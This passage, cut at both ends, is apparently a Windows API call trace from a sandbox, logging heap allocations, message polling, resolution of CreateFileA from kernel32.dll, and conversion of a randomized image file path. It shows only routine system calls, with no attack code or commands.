returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0040.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0040.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0040.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.221] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0040.221] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.221] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.221] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0040.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0040.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0040.222] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0040.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0040.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0040.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0040.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0040.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0040.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0040.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0040.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0040.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.224] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.227] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0040.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c9a0 [0040.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c9a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0040.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.227] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0040.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9a0 [0040.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c9a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0040.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.227] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0040.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0040.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0040.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0040.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x51) returned 0x794b90 [0040.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif", cchWideChar=81, lpMultiByteStr=0x794b90, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif", lpUsedDefaultChar=0x0) returned 81 [0040.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: 